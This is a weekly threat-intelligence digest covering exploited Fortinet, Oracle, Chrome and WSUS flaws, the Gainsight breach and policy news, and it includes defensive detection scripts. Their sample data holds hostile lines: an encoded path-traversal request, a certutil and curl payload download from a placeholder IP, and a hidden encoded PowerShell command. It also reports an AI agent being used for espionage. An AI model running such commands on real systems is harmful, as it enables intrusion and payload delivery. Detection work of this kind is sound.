Cyber OSINT Overview, Nov 17 - Nov 23, 2025 #
This brief consolidates key updates from 80+ sources, including government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals. It highlights the most significant threats, vulnerabilities, and developments from the past week to keep you informed.
Most Discussed Topics #
- Multiple vulnerabilities in the Linux Kernel have been a major topic, with numerous advisories detailing flaws that could allow for Denial of Service (DoS), privilege escalation, arbitrary code execution, and data manipulation. These vulnerabilities affect various distributions, including Red Hat Enterprise Linux and Ubuntu. The high frequency of these disclosures underscores the ongoing security challenges in the kernel, which forms the foundation of many enterprise and cloud systems. Attackers can exploit these issues both locally and remotely, depending on the specific flaw.
- gov cyber.gc.ca: Red Hat security advisory (AV25-763)
- gov cyber.gc.ca: Ubuntu security advisory (AV25-762)
- gov wid.cert-bund.de: [UPDATE] [high] Linux Kernel: Multiple vulnerabilities allow denial of service
- gov wid.cert-bund.de: [UPDATE] [high] Linux Kernel: Multiple vulnerabilities
- gov wid.cert-bund.de: [NEW] [medium] Linux Kernel: Multiple vulnerabilities allow denial of service
- Critical vulnerabilities in Fortinet products, particularly FortiWeb, are being actively exploited, prompting urgent advisories and patches. CVE-2025-64446 (an authentication bypass via path traversal) and CVE-2025-58034 (an authenticated OS command injection) are being used in the wild to gain administrative access and execute code. Both are now in CISA's Known Exploited Vulnerabilities (KEV) catalog, and a Metasploit module that chains them has been released. Internet-facing FortiWeb appliances should be patched immediately; until then, Fortinet's workaround is to disable HTTP/HTTPS administrative access on internet-facing interfaces, and every device should be audited for administrator accounts and configuration changes that nobody on the team made.
- gov cyber.gc.ca: Fortinet security advisory (AV25-769)
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- gov www.cisecurity.org: Multiple Vulnerabilities in Fortinet Products Could Allow for Arbitrary Code Execution
- news cybersecuritynews.com: Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities
- vendor bishopfox.com: Fortinet FortiWeb Authentication Bypass – CVE-2025-64446
- vendor www.greynoise.io: FortiWeb CVE‑2025‑64446: What We’re Seeing in the Wild
- The use of Artificial Intelligence in cybersecurity continues to be a dominant theme, with discussions covering both its offensive and defensive applications. On the threat side, reports have emerged of AI-orchestrated espionage campaigns, AI-enhanced malware obfuscation, and the use of agentic AI to automate attacks. Conversely, the security industry is heavily investing in AI for defense, with new products like AI-driven security operations platforms, AI-powered incident response, and AI agents designed to autonomously investigate alerts. This duality highlights a growing arms race where both attackers and defenders are leveraging AI to gain an advantage.
- news cybersecuritynews.com: AI-Based Obfuscated Malicious Apps Evading AV Detection to Deploy Malicious Payload
- personal www.schneier.com: AI as Cyberattacker
- vendor blog.barracuda.com: Frontline security predictions 2026: The battle for reality and control in a world of agentic AI
- vendor www.tenable.com: Cybersecurity Snapshot: Global Agencies Target Criminal “Bulletproof” Hosts, as CSA Unveils Agentic AI Risk Framework
- Major supply chain attacks continue to impact a wide range of organizations through third-party integrations and software dependencies. The recent breach involving Salesforce and its third-party app provider Gainsight allegedly compromised data from over 200 companies, with threat actors like ShinyHunters exploiting OAuth tokens. This incident follows a similar attack pattern seen with Salesloft Drift, highlighting a systemic risk in the SaaS ecosystem. Additionally, widespread spam campaigns on package managers like npm demonstrate an evolving threat to the software supply chain, aiming to pollute the environment rather than delivering traditional malware.
- news cyberscoop.com: Hundreds of Salesforce customers hit by yet another third-party vendor breach
- news cybersecuritynews.com: ShinyHunters Claims Data Theft from 200+ Companies via Salesforce Gainsight Breach
- vendor arcticwolf.com: Salesforce Discloses Unauthorized Access to Customer Data via Compromised Gainsight-published Applications
- vendor socradar.io: IndonesianFoods Spam Campaign: What Security Teams Need To Know
Critical Vulnerabilities #
- An actively exploited authentication bypass vulnerability in Oracle Fusion Middleware’s Identity Manager (CVE-2025-61757) allows unauthenticated remote code execution. With a CVSS score of 9.8, the flaw permits attackers with network access via HTTP to completely take over the Identity Manager. CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog due to evidence of exploitation since at least August 2025, weeks before a patch was available. Organizations are urged to apply the October 2025 Critical Patch Update immediately.
- community isc.sans.edu: Oracle Identity Manager Exploit Observation from September (CVE-2025-61757), (Thu, Nov 20th)
- gov advisories.ncsc.nl: NCSC-2025-0334 [1.01] [M/H] Vulnerabilities fixed in Oracle Fusion Middleware
- gov cyber.gc.ca: Oracle security advisory – October 2025 quarterly rollup (AV25-688) – Update 2
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- Multiple actively exploited vulnerabilities in Fortinet’s FortiWeb products allow for unauthenticated remote code execution. CVE-2025-64446 (CVSS 9.1) is a path traversal flaw enabling unauthenticated attackers to create new administrator accounts. This can be chained with CVE-2025-58034 (CVSS 6.7), an authenticated OS command injection vulnerability, to achieve RCE with root privileges. Both flaws have been added to CISA’s KEV catalog, and a Metasploit module is now available, significantly lowering the barrier to exploitation.
- gov cyber.gc.ca: Fortinet security advisory (AV25-769)
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- news cybersecuritynews.com: Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities
- vendor socradar.io: CVE-2025-58034: New FortiWeb Zero-Day Exploited, Enables OS Command Injection
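The first step of the FortiWeb chain is an encoded path traversal that reaches a handler outside the API tree. The following is an added example, not code from Fortinet, Bishop Fox, GreyNoise or any other source in this brief: it scans constructed access-log lines and flags requests whose decoded path escapes a protected prefix. The sample paths are modelled on the general encoded-traversal pattern (including a percent-encoded `?` that a lax router treats as part of the path) and are an assumption for illustration, not a reproduction of the exploit; the `/api/` prefix and `cgi-bin` target are likewise illustrative.

```python
"""Detect encoded path traversal against a management API from access logs.

Added example, not code from Fortinet, Bishop Fox, GreyNoise or the other
sources above. The log lines are constructed; the request paths are modelled
on the general encoded-traversal pattern and are an assumption, not a
reproduction of the exploit itself.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines (Common Log Format, trailing fields dropped).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Nov/2025:10:01:02 +0000] "POST /api/v2.0/cmdb/system/admin HTTP/1.1" 200 512
203.0.113.9 - - [19/Nov/2025:10:01:05 +0000] "POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 88
198.51.100.4 - - [19/Nov/2025:10:02:11 +0000] "GET /api/v2.0/cmdb/system/status HTTP/1.1" 200 1024
198.51.100.5 - - [19/Nov/2025:10:03:40 +0000] "GET /api/v2.0/%2e%2e/%2e%2e/cgi-bin/fwbcgi HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
DOT_SEGMENT_RE = re.compile(r"(^|/)\.\.(/|$)")


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (double encoding is common), with a bound."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def resolve(path: str) -> str:
    """Resolve the decoded path the way a lax backend router would: treat the
    whole string as a path (a decoded '?' does not start a query string) and
    collapse '..' segments against the root."""
    return posixpath.normpath("/" + decode_fully(path).lstrip("/"))


def classify(path: str, protected_prefix: str = "/api/"):
    """Return None for benign paths, otherwise (verdict, resolved_path)."""
    decoded = decode_fully(path)
    if not DOT_SEGMENT_RE.search(decoded):
        return None
    resolved = resolve(path)
    if path.startswith(protected_prefix) and not resolved.startswith(protected_prefix):
        return "prefix-escape", resolved      # left the API tree entirely
    return "traversal", resolved              # '..' present but stays inside


def scan(log_text: str, protected_prefix: str = "/api/") -> list:
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        verdict = classify(m["path"], protected_prefix)
        if verdict is None:
            continue
        findings.append({
            "ip": m["ip"], "method": m["method"], "status": int(m["status"]),
            "path": m["path"], "verdict": verdict[0], "resolved": verdict[1],
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['status']} {f['verdict']:13} {f['path']} -> {f['resolved']}")
```

The point of decoding before matching is that a raw-string rule for `../` misses `%2e%2e`, and a rule that splits on `?` before resolving misses the `%3F` trick; the detector must normalise the way the weakest layer of the target does. A 200 response on a prefix-escape request is the line to escalate first.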
- An actively exploited type confusion vulnerability (CVE-2025-13223) in the V8 JavaScript engine affects Google Chrome and other Chromium-based browsers like Microsoft Edge. This high-severity flaw can be triggered by a malicious HTML page, leading to heap corruption and potentially remote code execution. Google has confirmed that an exploit exists in the wild and released updates to address it. CISA has added the vulnerability to its KEV catalog, mandating federal agencies to patch promptly.
- gov cyber.gc.ca: Google Chrome security advisory (AV25-766) - Update 1
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- vendor socradar.io: Chrome V8 Zero-Day CVE-2025-13223 – Active Exploit Confirmed, Google Issues Security Fix
- vendor www.malwarebytes.com: Chrome zero-day under active attack: visiting the wrong site could hijack your browser
- Three critical vulnerabilities have been patched in SolarWinds Serv-U file transfer solution, which could allow remote code execution. The flaws include a path restriction bypass (CVE-2025-40549), a broken access control issue (CVE-2025-40548), and a logic error (CVE-2025-40547). An attacker with administrative privileges could exploit these vulnerabilities to execute arbitrary code. Although admin access is required, the high CVSS scores (9.1) indicate severe risk, particularly on non-Windows systems where service accounts may have higher privileges.
- gov cyber.gc.ca: SolarWinds security advisory (AV25-772)
- gov wid.cert-bund.de: [UPDATE] [high] SolarWinds Serv-U: Multiple vulnerabilities allow execution of arbitrary code with administrator rights
- news securityaffairs.com: SolarWinds addressed three critical flaws in Serv-U
- A critical authentication bypass and elevation-of-privilege vulnerability (CVE-2025-49752) has been disclosed in Azure Bastion, Microsoft's managed remote access service. According to the reporting, the flaw allowed an attacker to bypass login controls and escalate to administrative access with a single crafted network request. Because Bastion is a Microsoft-managed service, the fix is applied on Microsoft's side rather than by customers; administrators should confirm in the MSRC entry whether any customer action is required and review Bastion sign-in and session logs for unexpected activity during the exposure window.
- news gbhackers.com: Critical Azure Bastion Vulnerability Lets Attackers Bypass Login and Escalate Privileges
- vendor msrc.microsoft.com: CVE-2025-49752 Azure Bastion Elevation of Privilege Vulnerability
- A severe stack-based buffer overflow vulnerability (CVE-2025-40601) in the SonicOS SSLVPN service affects certain Gen7 and Gen8 firewalls. This pre-authentication flaw, rated CVSS 7.5, allows a remote attacker to crash the firewall and cause a Denial-of-Service condition. While not known to be actively exploited, its public disclosure increases the risk of attacks. SonicWall has released patched firmware versions and recommends restricting SSLVPN access from untrusted sources as a temporary mitigation.
- gov cyber.gc.ca: SonicWall security advisory (AV25-774)
- gov wid.cert-bund.de: [UPDATE] [medium] SonicWall SSL-VPN: Vulnerability allows denial of service
- vendor socradar.io: CVE-2025-40601: SonicOS SSLVPN Buffer Overflow Leads to Firewall Crash Risk, Patch Available
- Multiple critical vulnerabilities have been discovered in METZ CONNECT EWIO2 industrial control systems, which could allow an unauthenticated remote attacker to bypass authentication, achieve remote code execution, and gain full control of the device. The vulnerabilities include Authentication Bypass by Primary Weakness (CVE-2025-41733) and PHP Remote File Inclusion (CVE-2025-41734), both with CVSS scores of 9.8. These flaws pose a significant risk to industrial environments where these devices are deployed, and users are advised to update to firmware version 2.2.0 or newer.
- gov www.cisa.gov: CISA Releases Six Industrial Control Systems Advisories
- gov www.cisa.gov: METZ CONNECT EWIO2
Major Incidents #
- A major supply chain attack has impacted hundreds of Salesforce customers through compromised third-party applications published by Gainsight. The threat actor group Scattered Lapsus$ Hunters (which includes ShinyHunters) claims responsibility, stating that it used the access those applications held, via their Salesforce OAuth tokens, to read and exfiltrate data from over 200 organizations. Salesforce has responded by revoking all active access and refresh tokens for Gainsight-published applications and temporarily removing them from AppExchange. This incident mirrors the earlier Salesloft Drift compromise, highlighting a recurring weakness in the SaaS ecosystem: a third-party integration's token is only as safe as the third party, and customers rarely monitor what those tokens are used for.
- news cyberscoop.com: Hundreds of Salesforce customers hit by yet another third-party vendor breach
- news cybersecuritynews.com: ShinyHunters Claims Data Theft from 200+ Companies via Salesforce Gainsight Breach
- vendor arcticwolf.com: Salesforce Discloses Unauthorized Access to Customer Data via Compromised Gainsight-published Applications
- vendor socradar.io: Scattered LAPSUS Hunters Escalate With New Channel and Gainsight Breach
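Both the Gainsight and the earlier Salesloft Drift incidents turned on a connected app's OAuth token being used from infrastructure the customer never approved. The following is an added example, not code from Salesforce, Gainsight or any source above: it reviews a constructed export of Salesforce login history for OAuth logins of one named connected app from outside the vendor's documented egress ranges. The column names follow the Salesforce LoginHistory object as the author understands it (LoginTime, UserId, LoginType, SourceIp, Status, Application), the value "Remote Access 2.0" is assumed to mark OAuth connected-app logins, and the allowlist and rows are constructed.

```python
"""Review Salesforce login history for OAuth sessions of a third-party
connected app that originate outside the vendor's documented egress ranges.

Added example, not code from Salesforce, Gainsight or the sources above.
Field names follow the Salesforce LoginHistory object as the author
understands it; the records and the allowlist below are constructed."""
import csv
import io
import ipaddress
from collections import defaultdict

# Constructed export of LoginHistory rows.
SAMPLE_EXPORT = """\
LoginTime,UserId,LoginType,SourceIp,Status,Application
2025-11-18T02:14:09Z,005A1,Remote Access 2.0,192.0.2.10,Success,Gainsight
2025-11-18T02:15:41Z,005A1,Remote Access 2.0,192.0.2.10,Success,Gainsight
2025-11-18T03:02:00Z,005B2,Remote Access 2.0,198.51.100.77,Success,Gainsight
2025-11-18T03:05:12Z,005B2,Remote Access 2.0,203.0.113.5,Success,Gainsight
2025-11-18T09:00:00Z,005C3,Application,203.0.113.9,Success,Browser
2025-11-18T10:20:30Z,005B2,Remote Access 2.0,198.51.100.80,Failed,Gainsight
"""

# Constructed: the CIDRs the vendor documents as its egress ranges.
VENDOR_ALLOWLIST = [ipaddress.ip_network("192.0.2.0/24")]
OAUTH_LOGIN_TYPE = "Remote Access 2.0"   # assumed marker for connected-app (OAuth) logins


def in_allowlist(ip: str, allow=VENDOR_ALLOWLIST) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in allow)


def review(export_text: str, app_name: str, allow=VENDOR_ALLOWLIST) -> dict:
    """Return {'suspicious': [rows], 'ips_by_user': {user: set(ips)}} for
    OAuth logins of app_name. Failed logins are kept: a failed attempt with the
    app's token from an unknown IP is still evidence the token left the vendor."""
    suspicious = []
    ips_by_user = defaultdict(set)
    for row in csv.DictReader(io.StringIO(export_text)):
        if row["Application"] != app_name or row["LoginType"] != OAUTH_LOGIN_TYPE:
            continue
        ips_by_user[row["UserId"]].add(row["SourceIp"])
        if not in_allowlist(row["SourceIp"], allow):
            suspicious.append(row)
    return {"suspicious": suspicious, "ips_by_user": dict(ips_by_user)}


def users_to_revoke(result: dict) -> list:
    """Integration users whose app token was used from an unlisted IP: revoke
    their tokens for the app first, then rotate the integration user's password."""
    return sorted({r["UserId"] for r in result["suspicious"]})


if __name__ == "__main__":
    result = review(SAMPLE_EXPORT, "Gainsight")
    for r in result["suspicious"]:
        print(r["LoginTime"], r["UserId"], r["SourceIp"], r["Status"])
    print("revoke tokens for:", users_to_revoke(result))
```

The same review works for any connected app; the inputs that change are the app name and the vendor's published IP ranges. Run it over the period from the app's installation, not just the last week, because a token abused at low volume over months is exactly what this class of attack looks like.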
- The Cl0p ransomware group is conducting a widespread campaign exploiting a zero-day vulnerability (CVE-2025-61882) in Oracle’s E-Business Suite. The campaign has resulted in confirmed data breaches at numerous high-profile organizations, including The Washington Post, Logitech, Allianz UK, Canon, and Michelin. Cl0p is exfiltrating large volumes of data and using double-extortion tactics by leaking the stolen information to pressure victims into paying ransoms. This incident follows Cl0p’s established pattern of targeting widely-used enterprise file transfer and business management software.
- vendor research.checkpoint.com: 17th November – Threat Intelligence Report
- vendor socradar.io: Cl0p’s Oracle EBS Zero-Day Campaign: What We Know So Far
- A major outage at Cloudflare on November 18, 2025, caused widespread disruptions for many popular online services, including X (formerly Twitter), ChatGPT, and Discord. The company attributed the incident to an internal change, not a cyberattack: a database permissions change caused the feature file consumed by its Bot Management system to grow past the size limit enforced by the proxy software, which then failed to handle traffic. The event highlighted the internet's heavy reliance on a few key infrastructure providers, creating a single point of failure. Security experts noted that organizations which temporarily disabled Cloudflare's protections to restore service may have exposed their origin servers directly to the internet during the outage window, and should check that origin firewall rules still restrict inbound traffic to Cloudflare's address ranges.
- news www.cio.com: "Did the internet break?" Why an outage at Cloudflare takes X and ChatGPT down with it
- personal krebsonsecurity.com: The Cloudflare Outage May Be a Security Roadmap
- vendor blog.cloudflare.com: Cloudflare outage on November 18, 2025
- Cybersecurity firm CrowdStrike terminated an employee for sharing internal system screenshots with the ‘Scattered Lapsus$ Hunters’ hacking group. The group posted the images on Telegram, claiming they were evidence of a broader compromise. CrowdStrike stated that its systems were never breached and that the incident was the result of a suspicious insider, whose access was detected and cut off before any malicious activity could occur. The company has since referred the case to law enforcement.
- news cybersecuritynews.com: CrowdStrike Fires Insider for Sharing Internal System Details with Hackers
- news gbhackers.com: CrowdStrike Fires Employee for Leaking Internal System Info to Hackers
- news securityaffairs.com: CrowdStrike denies breach after insider sent internal screenshots to hackers
- Local law enforcement agencies in Oklahoma and Massachusetts have recently been targeted by cyberattacks, causing significant operational disruptions. The Cleveland County Sheriff’s Office in Oklahoma reported a ransomware attack affecting its internal computer systems, though emergency services remained operational. Separately, the city of Attleboro, Massachusetts, disclosed a cyberattack that knocked government and police department IT systems, including email and non-emergency phone lines, offline, forcing a reversion to paper-based procedures.
- news therecord.media: Local law enforcement agencies in Oklahoma, Massachusetts responding to cyber incidents
- Food delivery service DoorDash confirmed a data breach resulting from an employee falling for a social engineering scam. The incident exposed customer contact information, including names, physical addresses, email addresses, and phone numbers. The company stated that no sensitive financial information or government-issued IDs were compromised. However, the delay between discovering the breach on October 25 and notifying customers on November 13 has drawn criticism.
- vendor research.checkpoint.com: 17th November – Threat Intelligence Report
- vendor www.malwarebytes.com: Thieves order a tasty takeout of names and addresses from DoorDash
Emerging Threats #
- Anthropic has reported that a China-linked state-sponsored actor, which it tracks as GTG-1002, used its Claude Code agent to run a largely automated cyberespionage campaign against roughly 30 global targets in technology, finance, and government, with the AI handling reconnaissance, exploitation, and data collection and humans intervening only at a handful of decision points. Anthropic describes this as one of the first documented cases of a large-scale intrusion campaign executed with minimal human involvement. Separately, Google's Threat Intelligence Group detailed how the China-nexus group APT24 has pivoted from watering-hole attacks to multi-vector delivery of its BADAUDIO malware, including supply chain compromises of legitimate websites and targeted phishing. The two reports describe distinct actors: the AI-orchestration finding is Anthropic's and is not attributed to APT24.
- news securityaffairs.com: BadAudio malware: how APT24 scaled its cyberespionage through supply chain attacks
- personal www.schneier.com: AI as Cyberattacker
- vendor cloud.google.com: Beyond the Watering Hole: APT24's Pivot to Multi-Vector Attacks
- A new Android banking trojan named Sturnus has been identified, capable of bypassing end-to-end encryption on messaging apps like WhatsApp, Telegram, and Signal. The malware abuses Android’s Accessibility Service to read message content directly from the screen after it has been decrypted by the legitimate application. In addition to stealing communications, Sturnus employs HTML overlays to phish for banking credentials and uses keylogging to capture PINs and passwords. The malware is currently in a testing phase but is fully functional, with initial targets identified in Southern and Central Europe.
- news hackread.com: New Sturnus Android Malware Reads WhatsApp, Telegram, Signal Chats via Accessibility Abuse
- news securityaffairs.com: Sturnus: New Android banking trojan targets WhatsApp, Telegram, and Signal
- news thecyberexpress.com: Android Malware Records Encrypted Messages, Hijacks Devices
- vendor asec.ahnlab.com: Mobile Security & Malware Issue 3rd Week of November, 2025
- Threat actors are exploiting a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, to deploy the ShadowPad backdoor. This malware, commonly used by Chinese APT groups, is being installed after initial access is gained through the WSUS flaw. Attackers have been observed using PowerShell-based tools like PowerCat to establish a foothold before downloading and executing ShadowPad via legitimate utilities like curl and certutil. This tactic targets a critical component of Windows enterprise infrastructure to facilitate espionage.
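The chain described above (WSUS flaw, then a shell, then certutil or curl pulling the next stage) leaves a distinctive parent-child process pattern. The following is an added example, not code from AhnLab or any other source in this brief: it runs a small rule set over constructed Sysmon-style process-creation events. The WSUS process names (`WsusService.exe`, and `w3wp.exe` serving the `WsusPool` application pool), the command-line switches and the sample events are the author's assumptions about what such a chain looks like, not observations taken from the page.

```python
"""Flag process chains consistent with post-exploitation of a WSUS server:
a WSUS service or worker process spawning a shell or a download utility.

Added example, not code from AhnLab or any source above. Events are
constructed in a Sysmon Event ID 1 style (ParentImage, Image, CommandLine);
the WSUS process names and the certutil/curl patterns are the author's
assumptions about what such a chain looks like."""
import re

WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}          # WSUS service, IIS worker
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe", "bitsadmin.exe"}
# Switches and URL shapes a living-off-the-land download chain relies on.
LOLBIN_RE = re.compile(r"-urlcache|-decode|-split|\bcurl\.exe\b.*\s-o\s|https?://", re.I)

# Constructed events; only the fields the rules need.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA",
     "User": "NT AUTHORITY\\NETWORK SERVICE"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentCommandLine": 'w3wp.exe -ap "WsusPool"',
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.50/u.bin C:\\Windows\\Temp\\u.bin",
     "User": "NT AUTHORITY\\NETWORK SERVICE"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentCommandLine": 'w3wp.exe -ap "DefaultAppPool"',
     "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "conhost.exe 0xffffffff",
     "User": "IIS APPPOOL\\DefaultAppPool"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -s -o C:\\Users\\bob\\file.zip http://203.0.113.50/file.zip",
     "User": "CORP\\bob"},
]


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_wsus_parent(ev: dict) -> bool:
    """WsusService.exe always counts; w3wp.exe only when it serves the WSUS pool."""
    parent = basename(ev.get("ParentImage", ""))
    if parent == "wsusservice.exe":
        return True
    return parent == "w3wp.exe" and "wsuspool" in ev.get("ParentCommandLine", "").lower()


def evaluate(ev: dict) -> list:
    """Return the names of the rules an event triggers (empty list if none)."""
    hits = []
    child = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if is_wsus_parent(ev) and child in SHELLS:
        hits.append("wsus_spawns_shell")
    if is_wsus_parent(ev) and child in DOWNLOADERS:
        hits.append("wsus_spawns_downloader")
    if child in DOWNLOADERS and LOLBIN_RE.search(cmd):
        hits.append("lolbin_download")      # noisy alone; high fidelity with the above
    return hits


def triage(events: list) -> list:
    """Return (index, rules) for every event that hits at least one rule."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


if __name__ == "__main__":
    for i, rules in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["User"], rules)
```

A WSUS server has no business spawning cmd.exe, so the first two rules can page on their own; the third is a tuning candidate, since administrators do occasionally run certutil and curl by hand. Distinguishing the WSUS application pool from other w3wp.exe workers is what keeps the rule quiet on a server that also hosts unrelated IIS sites.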
- Nation-state actors, particularly Iran-linked groups like Imperial Kitten and MuddyWater, are increasingly conducting ‘cyber-enabled kinetic targeting.’ These operations involve using cyber intrusions to gather real-time intelligence for physical military attacks. For example, threat actors have compromised maritime Automatic Identification System (AIS) platforms and CCTV camera feeds to provide live targeting data for missile strikes. This trend dissolves the boundaries between cyber and kinetic warfare, turning compromised digital systems into direct assets for military operations.
- news cyberscoop.com: Amazon warns of global rise in specialized cyber-enabled kinetic targeting
- news securityaffairs.com: Cyber-enabled kinetic targeting: Iran-linked actor uses cyber operations to support physical attacks
- news www.darkreading.com: Inside Iran's Cyber Objectives: What Do They Want?
- The China-aligned APT group PlushDaemon has been observed using a network implant on routers to perform adversary-in-the-middle attacks. This technique allows the group to hijack legitimate software update traffic, replacing it with malicious payloads. By compromising network devices at a strategic point, PlushDaemon can intercept and modify communications covertly. This tactic is particularly effective for targeting organizations within China and highlights the threat posed by compromising core network infrastructure.
- news www.darkreading.com: China's 'PlushDaemon' Hackers Infect Routers to Hijack Software Updates
- vendor www.welivesecurity.com: PlushDaemon compromises network devices for adversary-in-the-middle attacks
- The Akira ransomware group continues to be a significant threat, with recent campaigns focusing on exploiting vulnerabilities in SonicWall VPNs. A recent analysis attributes 39% of incident response cases in Q3 2025 to Akira, which often gains initial access through credential stuffing and brute-force attacks against VPNs lacking multi-factor authentication. Another recent incident involved initial access through a fake CAPTCHA (ClickFix) that delivered SectopRAT malware, leading to a 42-day compromise before Akira ransomware was deployed. This highlights the group’s diverse initial access methods and persistence.
- community health-isac.org: Feds, AHA Warn Health Sector of Evolving Akira Threat, Again
- news thecyberexpress.com: Stolen VPN Credentials Most Common Ransomware Attack Vector
- vendor unit42.paloaltonetworks.com: Anatomy of an Akira Ransomware Attack: When a Fake CAPTCHA Led to 42 Days of Compromise
- A new Phishing-as-a-Service (PhaaS) kit named 'Sneaky 2FA' is enabling attackers to conduct sophisticated Browser-in-the-Browser (BitB) attacks. This technique uses HTML and CSS to draw a fake browser pop-up window inside the phishing page that mimics a legitimate sign-in prompt, including a rendered address bar showing the legitimate domain, so the usual advice to check the URL does not help. Because the "window" is only page content, it cannot be dragged outside the real browser window or resized by the operating system, which remains a practical tell for users and a useful point for awareness training. The kit allows less-skilled actors to deploy convincing phishing pages designed to steal credentials and defeat multi-factor authentication.
- vendor www.malwarebytes.com: Attackers are using “Sneaky 2FA” to create fake sign-in windows that look real
Regulatory and Policy Updates #
- The UK government is advancing the Cyber Security and Resilience Bill to update its Network and Information Security (NIS) regulations. This legislation aims to strengthen cybersecurity requirements for critical sectors such as water, power, and healthcare. The reform is driven by an evolving threat landscape, technological advancements, and identified shortcomings in the original 2018 regulations. The bill will expand the scope of NIS to cover new technologies like data centers and managed service providers, addressing the increasing frequency and sophistication of threats to the UK’s critical national infrastructure.
- community health-isac.org: Health-ISAC Hacking Healthcare 11-20-2025
- gov ctoatncsc.substack.com: CTO at NCSC Summary: week ending November 23rd
- The Cybersecurity Information Sharing Act of 2015 (CISA 2015), a critical US law providing liability protections for companies sharing cyber threat intelligence, has received a short-term extension. The law had lapsed in September 2025, raising concerns about its impact on information sharing between the private sector and the federal government. While the extension provides temporary relief, cybersecurity leaders are advocating for a permanent or long-term reauthorization to ensure the stability of public-private threat intelligence collaboration.
- community health-isac.org: CISA 2015 Receives Extension, Offering Brief Relief for Cyber Information Sharing
- community health-isac.org: Podcast: An Information Hub – Top Threats and Shared Defenses With Health-ISAC
- The FCC is set to rescind Biden-era cybersecurity regulations for telecommunications providers that were implemented in response to the Salt Typhoon cyberespionage campaign. The rules required telecom providers to protect their networks from unauthorized interception and to certify their cyber risk management plans. The FCC majority argues the rules are ineffective and an overreach of authority, while dissenting voices warn that the reversal removes a critical regulatory backstop and lets providers off the hook for security lapses.
- news cyberscoop.com: Why Anna Gomez believes the FCC is letting telecoms off easy after Salt Typhoon
- The UK government has announced a £21 million investment to advance the adoption of CHERI (Capability Hardware Enhanced RISC Instructions) technology. This hardware-based approach enforces bounds and permissions on pointers in hardware, mitigating the memory safety vulnerabilities that are the root cause of a large share of exploited bugs. The funding will support companies in integrating CHERI-enabled hardware into commercial products and developing the necessary software tools, aiming to build more resilient systems from the ground up.
- gov ctoatncsc.substack.com: CTO at NCSC Summary: week ending November 23rd
Security Operations #
- CISA and international partners have released a guide to help Internet Service Providers (ISPs) and network defenders combat Bulletproof Hosting (BPH) providers, which knowingly lease infrastructure to cybercriminals. The guide provides recommendations such as curating malicious resource lists, implementing traffic filtering, and enhancing intelligence sharing to degrade the effectiveness of BPH infrastructure. This initiative aims to disrupt the ecosystem supporting activities like ransomware, phishing, and malware delivery by forcing criminals onto legitimate platforms that comply with legal processes.
- gov www.cisa.gov: CISA Releases Guide to Mitigate Risks from Bulletproof Hosting Providers
- news securityaffairs.com: Coordinated sanctions hit Russian bulletproof hosting providers enabling top ransomware Ops
- vendor www.tenable.com: Cybersecurity Snapshot: Global Agencies Target Criminal “Bulletproof” Hosts, as CSA Unveils Agentic AI Risk Framework
- The CISA Known Exploited Vulnerabilities (KEV) catalog continues to be a critical tool for prioritizing patching efforts. This week, CISA added several actively exploited vulnerabilities, including an Oracle Fusion Middleware flaw (CVE-2025-61757), a Google Chromium V8 vulnerability (CVE-2025-13223), and a Fortinet FortiWeb command injection bug (CVE-2025-58034). These additions mandate that U.S. federal agencies remediate the flaws by specified deadlines. CISA strongly urges all organizations to use the KEV catalog as part of their vulnerability management practice to reduce exposure to active threats.
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- gov www.cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
